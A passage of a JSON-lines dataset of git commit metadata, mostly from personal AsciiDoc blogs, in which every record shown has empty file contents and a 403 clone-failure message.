rotel\/studio,ciena-blueplanet\/developers.blog,qingyuqy\/qingyuqy.io,Port666\/hubpress.io,sebprev\/blog,juhuntenburg\/gsoc2017,aspick\/hubpress.io,gbougeard\/blog.english,akhmetgali\/hubpress.io,btsibr\/myhubpress,heartnn\/hubpress.io,rorosaurus\/hubpress.io,OlympusOnline2\/announcements,Nepal-Blockchain\/danphe-blogs,crobby\/hubpress.io,binout\/javaonemorething,pepite\/hubpress.io,gbougeard\/blog.english,laibaogo\/hubpress.io,matthardwick\/hubpress.io,plyom\/hubpress.io,OdieD8\/hubpress.io,princeminz\/blog,hiun\/hubpress.io,DavidTPate\/davidtpate.com,entropyz\/blog,topicusonderwijs\/topicusonderwijs.github.io,ditirambo\/ditirambo.es,ashalkhakov\/hubpress.io,heartnn\/hubpress.io,magivfer\/pages,palaxi00\/palaxi00.github.io,xinmeng1\/note,pramodjg\/articles,ashalkhakov\/hubpress.io,wzzrd\/hubpress.io,sxgc\/blog,cmolitor\/blog,nicolaschaillot\/pechdencouty,jjmean2\/server-study,binout\/javaonemorething,heartnn\/hubpress.io,thaibeouu\/blog,mkent-at-rivermeadow-dot-com\/hubpress.io,rynop\/rynop.hubpress.io,porolakka\/hubpress.io,ambarishpande\/blog,anshu92\/blog,porolakka\/hubpress.io,hva314\/blog,ambarishpande\/blog,OdieD8\/hubpress.io,brendena\/hubpress.io,anandjagad
eesh\/blog,OlympusOnline2\/announcements,ruaqiwei23\/blog,gsha0\/hubpress.io,ml4den\/hubpress,nthline\/hubpress.io,manelvf\/blog,sakkemo\/blog,ice09\/ice09ng,gogonkt\/makenothing,shunkou\/blog,cmhgroupllc\/blog,elinep\/blog,porolakka\/hubpress.io,rynop\/rynop.hubpress.io,dsuryakusuma\/dsuryakusuma.github.io,dsuryakusuma\/dsuryakusuma.github.io,loetjoe\/blog,magivfer\/pages,jsiu22\/blog,jerometambo\/blog,alexknowshtml\/thebigmove,qingyuqy\/qingyuqy.io,berryzed\/tech-blog,josegomezr\/blog,entropyz\/blog,Evolution2626\/blog,gbougeard\/blog.english,berryzed\/tech-blog,lrabiet\/patisserie,OlympusOnline2\/announcements,adjiebpratama\/press,berryzed\/tech-blog,IEEECompute\/blog,nicksam112\/nicksam112.github.io,aspick\/hubpress.io,simonturesson\/hubpresstestsimon,seturne\/hubpress.io,anshu92\/blog,sebprev\/blog,Nepal-Blockchain\/danphe-blogs,aql\/hubpress.io,btsibr\/myhubpress,loetjoe\/blog,mimiz\/mimiz.github.io,kornel661\/blog-test-jm,shunkou\/blog,jabbytechnologies\/blog,chackomathew\/blog,matthardwick\/hubpress.io,rynop\/rynop.hubpress.io,binout\/javaonemorething,shunkou\/blog,sebarid\/pages,shinnoki\/hubpress.io,ml4den\/hubpress,jcsirot\/hubpress.io,pramodjg\/articles,AnassKartit\/anasskartit.github.io,willcrisis\/www.willcrisis.com,DavidTPate\/davidtpate.com,msavy\/rhymewithgravy.com,manelvf\/blog,btsibr\/myhubpress,mrtrombley\/blog,lrabiet\/patisserie,anandjagadeesh\/blog,ciena-blueplanet\/developers.blog,ambarishpande\/blog,jlmcgehee21\/nooganeer,shinnoki\/hubpress.io,simonturesson\/hubpresstestsimon,kornel661\/blog-test-jm,thaibeouu\/blog,wzzrd\/hubpress.io,discimport\/blog.discimport.dk,yaks-all-the-way-down\/hubpress.github.io,lawrencetaylor\/hubpress.io,jbutz\/hubpress-test,Nepal-Blockchain\/danphe-blogs,jerometambo\/blog,lichengzhu\/blog,miroque\/shirokuma,princeminz\/blog,cmhgroupllc\/blog,anthonny\/personal-blog,willcrisis\/www.willcrisis.com,loetjoe\/blog,trycrmr\/hubpress.io,wzzrd\/hubpress.io,ml4den\/hubpress,mairandomness\/randomblog,lawrencetaylor\/hubpress.io,baocongchen\/blogs,setupminimal\/blog,PerthHackers\/blog,corporatesanyasi\/corporatesanyasi.github.io,wzzrd\/hubpress.io,Jason2013\/hubpress,ditirambo\/ditirambo.es,palaxi00\/palaxi00.github.io,aspick\/hubpress.io,AnassKartit\/anasskartit.github.io,setupminimal\/blog,pepite\/hubpress.io,kobusb\/blog,AnassKartit\/anasskartit.github.io,simonturesson\/hubpresstestsimon,SnorlaxH\/blog.urusa.me,nicolaschaillot\/pechdencouty,jcsirot\/hubpress.io,hva314\/blog,juhuntenburg\/gsoc2017,crotel\/meditation,rorohiko21\/blog,binout\/javaonemorething,plyom\/hubpress.io,DavidTPate\/davidtpate.com,Port666\/hubpress.io,mimiz\/mimiz.github.io,pepite\/hubpress.io,setupminimal\/blog,jcsirot\/hubpress.io,juhuntenburg\/gsoc2017,discimport\/blog.discimport.dk,Adyrhan\/adyrhan.github.io,rynop\/rynop.hubpress.io,willcrisis\/www.willcrisis.com,pramodjg\/articles,ErJ101\/hbspractise,fghhfg\/hubpress.io,Evolution2626\/blog,jbutz\/hubpress-test,Bloggerschmidt\/bloggerschmidt.de,DavidTPate\/davidtpate.com,mcornell\/OFM,nicolaschaillot\/pechdencouty,joshuarrrr\/hubpress.io,nicksam112\/nicksam112.github.io,SockPastaRock\/hubpress.io,ml4den\/hubpress,Jekin6\/blog,atomfrede\/shiny-adventure,jsiu22\/blog,nandansaha\/AroundTheWeb,DaOesten\/hubpress.io,rubyinhell\/hubpress.io,jcsirot\/hubpress.io,tom-konda\/blog,celsogg\/blog,sanctumware\/hubpress,heartnn\/hubpress.io,jlmcgehee21\/nooganeer,agentmilindu\/hubpress.io,msavy\/rhymewithgravy.com,hva314\/blog,igovsol\/blog,seturne\/hubpress.io,anthonny\/personal-blog,agentmilindu\/hubpress.io,elinep\/blog,baocongche
n\/blogs,anwfr\/blog.anw.fr,nicksam112\/nicksam112.github.io,OdieD8\/hubpress.io,andreassiegelrfid\/hubpress.io,tom-konda\/blog,topicusonderwijs\/topicusonderwijs.github.io,cmolitor\/blog,laibaogo\/hubpress.io,jbutz\/hubpress-test,tmdgus0118\/blog.code404.co.kr,agentmilindu\/hubpress.io,hiun\/hubpress.io,arabindamoni\/hubpress.io,topicusonderwijs\/topicusonderwijs.github.io,nicksam112\/nicksam112.github.io,chackomathew\/blog,arabindamoni\/hubpress.io,Abdul2\/abdul2.github.io,palaxi00\/palaxi00.github.io,tmdgus0118\/blog.code404.co.kr,nandansaha\/AroundTheWeb,celsogg\/blog,Jekin6\/blog,jjmean2\/server-study,ncomet\/asciiblog,shunkou\/blog,sanctumware\/hubpress,manelvf\/blog,Adyrhan\/adyrhan.github.io,berryzed\/tech-blog,ditirambo\/ditirambo.es,ncomet\/asciiblog,lrabiet\/patisserie,sanctumware\/hubpress,matthardwick\/hubpress.io,DaOesten\/hubpress.io,nandansaha\/AroundTheWeb,andreassiegelrfid\/hubpress.io,Nepal-Blockchain\/danphe-blogs,mkent-at-rivermeadow-dot-com\/hubpress.io,tom-konda\/blog,andreassiegelrfid\/hubpress.io,brendena\/hubpress.io,fghhfg\/hubpress.io,juhuntenburg\/gsoc2017,crotel\/studio,SnorlaxH\/blog.urusa.me,anandjagadeesh\/blog,jsiu22\/blog,Adyrhan\/adyrhan.github.io,ashalkhakov\/hubpress.io,jjmean2\/server-study,artavels\/pages,jbutz\/hubpress-test,nthline\/hubpress.io,akhmetgali\/hubpress.io,ice09\/ice09ng,artavels\/pages,kornel661\/blog-test-jm,devananda\/devananda.github.io,PerthHackers\/blog,dsuryakusuma\/dsuryakusuma.github.io,moonPress\/press.io,koter84\/blog,trycrmr\/hubpress.io,akhmetgali\/hubpress.io,baocongchen\/blogs,igovsol\/blog,Jekin6\/blog,miroque\/shirokuma,jamarortiz\/pragmaticalware,ncomet\/asciiblog,Evolution2626\/blog,pdudits\/hubpress,alexknowshtml\/thebigmove,celsogg\/blog,ice09\/ice09ng,artavels\/pages,Abdul2\/abdul2.github.io,apoch\/blog,lawrencetaylor\/hubpress.io,Adyrhan\/adyrhan.github.io,hiun\/hubpress.io,corporatesanyasi\/corporatesanyasi.github.io,IEEECompute\/blog,anandjagadeesh\/blog,ncomet\/asciiblog,Jason2013\/hubpress,kobusb\/blog,fghhfg\/hubpress.io,xinmeng1\/note,DaOesten\/hubpress.io,anshu92\/blog,miroque\/shirokuma,corporatesanyasi\/corporatesanyasi.github.io,alexknowshtml\/thebigmove,mimiz\/mimiz.github.io,SnorlaxH\/blog.urusa.me,qingyuqy\/qingyuqy.io,josegomezr\/blog,sxgc\/blog,kobusb\/blog,anwfr\/blog.anw.fr,sebprev\/blog,ottoandry\/ottoandry1,jabbytechnologies\/blog,Evolution2626\/blog,atomfrede\/shiny-adventure,crobby\/hubpress.io,loetjoe\/blog,adjiebpratama\/press,pdudits\/pdudits.github.io,palaxi00\/palaxi00.github.io,nandansaha\/AroundTheWeb,aql\/hubpress.io,crobby\/hubpress.io,rorosaurus\/hubpress.io,pdudits\/pdudits.github.io,palaxi00\/palaxi00.github.io,mairandomness\/randomblog,PerthHackers\/blog,igovsol\/blog,sakkemo\/blog,ambarishpande\/blog,joshuarrrr\/hubpress.io,gogonkt\/makenothing,koter84\/blog,SnorlaxH\/blog.urusa.me,lawrencetaylor\/hubpress.io,jamarortiz\/pragmaticalware,josegomezr\/blog,ice09\/ice09ng,pepite\/hubpress.io,rorosaurus\/hubpress.io,jerometambo\/blog,laibaogo\/hubpress.io,jerometambo\/blog,moonPress\/press.io,pdudits\/hubpress,lichengzhu\/blog,dmacstack\/glob,dmacstack\/glob,ruaqiwei23\/blog,devananda\/devananda.github.io,trycrmr\/hubpress.io,ditirambo\/ditirambo.es,mrfgl\/blog,IEEECompute\/blog,jlmcgehee21\/nooganeer,setupminimal\/blog,mimiz\/mimiz.github.io,rorohiko21\/blog,discimport\/blog.discimport.dk,adjiebpratama\/press,ruaqiwei23\/blog,kornel661\/blog-test-jm,alexknowshtml\/thebigmove,anwfr\/blog.anw.fr,rorohiko21\/blog,celsogg\/blog,OdieD8\/hubpress.io,mairandomness\/randomblog,topicusonderwij
s\/topicusonderwijs.github.io,lichengzhu\/blog,princeminz\/blog,mcornell\/OFM,Bloggerschmidt\/bloggerschmidt.de,ottoandry\/ottoandry1,joshuarrrr\/hubpress.io,devananda\/devananda.github.io,mrtrombley\/blog,aql\/hubpress.io,plyom\/hubpress.io,miroque\/shirokuma,baocongchen\/blogs,rubyinhell\/hubpress.io,JohanBrunet\/hubpress.io,jjmean2\/server-study,yaks-all-the-way-down\/hubpress.github.io,shinnoki\/hubpress.io,SockPastaRock\/hubpress.io,sanctumware\/hubpress,pdudits\/hubpress,apoch\/blog,rubyinhell\/hubpress.io,thaibeouu\/blog,artavels\/pages,rubyinhell\/hubpress.io,matthardwick\/hubpress.io,rorosaurus\/hubpress.io,crobby\/hubpress.io,ciena-blueplanet\/developers.blog,cmhgroupllc\/blog,moonPress\/press.io,SockPastaRock\/hubpress.io,xinmeng1\/note,devananda\/devananda.github.io,trycrmr\/hubpress.io,lichengzhu\/blog,Jekin6\/blog,shinnoki\/hubpress.io,hva314\/blog,gsha0\/hubpress.io,elinep\/blog,sxgc\/blog,crotel\/studio,IEEECompute\/blog,Bloggerschmidt\/bloggerschmidt.de,arabindamoni\/hubpress.io,anthonny\/personal-blog,cmolitor\/blog,gbougeard\/blog.english,igovsol\/blog,joescharf\/joescharf.github.io,msavy\/rhymewithgravy.com,apoch\/blog,sebarid\/pages,thaibeouu\/blog,jabbytechnologies\/blog,entropyz\/blog,msavy\/rhymewithgravy.com,anthonny\/personal-blog,crotel\/meditation,dmacstack\/glob,rorohiko21\/blog,discimport\/blog.discimport.dk,koter84\/blog,tmdgus0118\/blog.code404.co.kr,tmdgus0118\/blog.code404.co.kr,jamarortiz\/pragmaticalware,corporatesanyasi\/corporatesanyasi.github.io,crotel\/meditation,gsha0\/hubpress.io,YvonneZhang\/yvonnezhang.github.io","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SockPastaRock\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bcf6e003614a31ee00e0d50545bd1edf05a9a0b7","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02b820a67c444f80b54bd26dcc5e5d434a9b2fe5","subject":"updated readme","message":"updated readme\n","repos":"iCasa\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,iamelectron\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,WPN-XM\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,iamelectron\/WPN-XM,Akhiljs\/WPN-XM,iamelectron\/WPN-XM,gencer\/WPN-XM,WPN-XM\/WPN-XM,iamelectron\/WPN-XM,iCasa\/WPN-XM,WPN-XM\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM,Akhiljs\/WPN-XM,gencer\/WPN-XM","old_file":"readme.asciidoc","new_file":"readme.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iCasa\/WPN-XM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa93e57db7c2fe4d56f103a032948fe23ece5b98","subject":"Update 2016-07-19-A-Dummy-Post.adoc","message":"Update 
2016-07-19-A-Dummy-Post.adoc","repos":"railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io,railsdev\/railsdev.github.io","old_file":"_posts\/2016-07-19-A-Dummy-Post.adoc","new_file":"_posts\/2016-07-19-A-Dummy-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/railsdev\/railsdev.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09490117b0bbf7498e4aa0c4804487553ba628f8","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2be490705291d4a52217ba9497066bb1dedf8530","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3caecde73cf6921c846135750e452bc335dba2b7","subject":"Update 2015-05-16-Faustino-loeza-Perez4.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez4.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez4.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3c7ee406bdf4aaee58381cb9709bf5f7c2defffa","subject":"Update 2015-12-13-Portmap-amplification.adoc","message":"Update 2015-12-13-Portmap-amplification.adoc","repos":"suedadam\/suedadam.github.io,suedadam\/suedadam.github.io,suedadam\/suedadam.github.io","old_file":"_posts\/2015-12-13-Portmap-amplification.adoc","new_file":"_posts\/2015-12-13-Portmap-amplification.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/suedadam\/suedadam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"784df4f09f1bd8ae24555b27072ef738029c082e","subject":"Update 2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","message":"Update 
2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_file":"_posts\/2016-03-18-Synchronizing-Living-Colors-gen2-round-remotes-Philips-Hue-bulbs-and-bridge-20-together.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"215de5eb663c994e713b8ed7d71dd5e9f9e7cfd6","subject":"CLOUD-269 add ENVs to doc","message":"CLOUD-269 add ENVs to doc\n","repos":"bdecoste\/application-templates,knrc\/application-templates,josefkarasek\/application-templates,jboss-openshift\/application-templates,errantepiphany\/application-templates,kyguy\/application-templates,douglaspalmer\/application-templates,rnetuka\/application-templates,rcernich\/application-templates,bparees\/application-templates","old_file":"docs\/datagrid\/datagrid65-basic.adoc","new_file":"docs\/datagrid\/datagrid65-basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jboss-openshift\/application-templates.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"affeba425e581dc88e9ca99c368f56ddcf3cfeff","subject":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","message":"Update 2015-02-16-Razrabotka-i-tvorchestvo.adoc","repos":"alchapone\/alchapone.github.io,alchapone\/alchapone.github.io,alchapone\/alchapone.github.io","old_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_file":"_posts\/2015-02-16-Razrabotka-i-tvorchestvo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alchapone\/alchapone.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40456a47e0d0c4227215e2a98afc6443639ba7a6","subject":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","message":"Update 2018-09-15-Hack-The-Box-Stratosphere.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_file":"_posts\/2018-09-15-Hack-The-Box-Stratosphere.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a377539c6651c9b1b6c27b341b9a9d92a6402f6d","subject":"Update 2015-02-13-Mockito-le-mock-facile.adoc","message":"Update 2015-02-13-Mockito-le-mock-facile.adoc","repos":"jabby\/jabby.github.io,jabby\/jabby.github.io,jabby\/jabby.github.io","old_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_file":"_posts\/2015-02-13-Mockito-le-mock-facile.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jabby\/jabby.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ceff005bf795c9194ee0472518b42d33d0c2c1d0","subject":"Update 2016-03-29-Zonas-de-transferencia.adoc","message":"Update 
2016-03-29-Zonas-de-transferencia.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_file":"_posts\/2016-03-29-Zonas-de-transferencia.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5792c3bbb091840d53f68b7b122f12f54c39ade8","subject":"Update 2017-08-19-Sony-WH-1000X-M-review.adoc","message":"Update 2017-08-19-Sony-WH-1000X-M-review.adoc","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc","new_file":"_posts\/2017-08-19-Sony-WH-1000X-M-review.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1ed05dc5afa6db5b9a10edeccef4d519d23e9f81","subject":"and again. I'm too stupid to merge the PR, I give up.","message":"and again. I'm too stupid to merge the PR, I give up.\n","repos":"aim42\/htmlSanityCheck,aim42\/htmlSanityCheck,aim42\/htmlSanityCheck","old_file":"src\/docs\/DevelopmentDocs.adoc","new_file":"src\/docs\/DevelopmentDocs.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aim42\/htmlSanityCheck.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0d4c733dd090ffc7db6d8223927e6b6af36ee8a6","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"05441a5d1e1ff2b5ef3da676c7e774e1c2f50cd9","subject":"fix: \u30ec\u30d3\u30e5\u30fc\u6307\u6458\u306e\u4fee\u6b63","message":"fix: \u30ec\u30d3\u30e5\u30fc\u6307\u6458\u306e\u4fee\u6b63\n","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_file":"_posts\/2018-05-21-flutter-introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9c3eba96dd27a8e40890212bb4b49bf4f9e7be72","subject":"Docs: Add missing migration doc for logging change","message":"Docs: Add missing migration doc for logging 
change\n","repos":"strapdata\/elassandra,vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra,vroyer\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/migration\/migrate_6_5.asciidoc","new_file":"docs\/reference\/migration\/migrate_6_5.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/strapdata\/elassandra.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1b5dcdc1891b5b38c7ea0b5b236642b3ab170c8e","subject":"Update 2015-03-13-Schatten-in-XFCE-412.adoc","message":"Update 2015-03-13-Schatten-in-XFCE-412.adoc","repos":"atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure,atomfrede\/shiny-adventure","old_file":"_posts\/2015-03-13-Schatten-in-XFCE-412.adoc","new_file":"_posts\/2015-03-13-Schatten-in-XFCE-412.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/atomfrede\/shiny-adventure.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"079cfcc553b6f3597e77c68da56ef83d6d631433","subject":"Update 2015-12-29-PAGE-NOT-FOUND-srsly.adoc","message":"Update 2015-12-29-PAGE-NOT-FOUND-srsly.adoc","repos":"Dekken\/dekken.github.io,Dekken\/dekken.github.io,Dekken\/dekken.github.io","old_file":"_posts\/2015-12-29-PAGE-NOT-FOUND-srsly.adoc","new_file":"_posts\/2015-12-29-PAGE-NOT-FOUND-srsly.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Dekken\/dekken.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe911f440d0441aa16f664c98c90e51048749cfe","subject":"y2b create post Headphones That Boom?","message":"y2b create post Headphones That Boom?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-04-12-Headphones-That-Boom.adoc","new_file":"_posts\/2016-04-12-Headphones-That-Boom.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"914ea62c1181616cab88ac20625a155df2457a08","subject":"Update 2015-07-11-Japanfest-in-M.adoc","message":"Update 2015-07-11-Japanfest-in-M.adoc","repos":"fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io,fundstuecke\/fundstuecke.github.io","old_file":"_posts\/2015-07-11-Japanfest-in-M.adoc","new_file":"_posts\/2015-07-11-Japanfest-in-M.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fundstuecke\/fundstuecke.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"522f242c168a2f0e9cadab264965c7bd4ca9d6da","subject":"Update 2016-05-06-Welcome-Pepper.adoc","message":"Update 2016-05-06-Welcome-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_file":"_posts\/2016-05-06-Welcome-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66e9376d410435e94f41100cbd67d7b12b268fc2","subject":"Update 2016-05-16-this-is-a-test.adoc","message":"Update 2016-05-16-this-is-a-test.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-16-this-is-a-test.adoc","new_file":"_posts\/2016-05-16-this-is-a-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"becd0e7b38ca16f1358dc8c4e4533075becaf8bd","subject":"Delete the file at '_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc'","message":"Delete the file at '_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_file":"_posts\/2017-04-10-0CTF-One-Time-Pad-by-Z3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"438acaa5bcfac1a48a49c500abbb6e61f8346d94","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 2017-01-20-Swift-Web-View.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_file":"_posts\/2017-01-20-Swift-Web-View.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3051b16582be4b2ac9c818c58023f3d9268a2430","subject":"Update 2017-02-07-Mi-primer-post.adoc","message":"Update 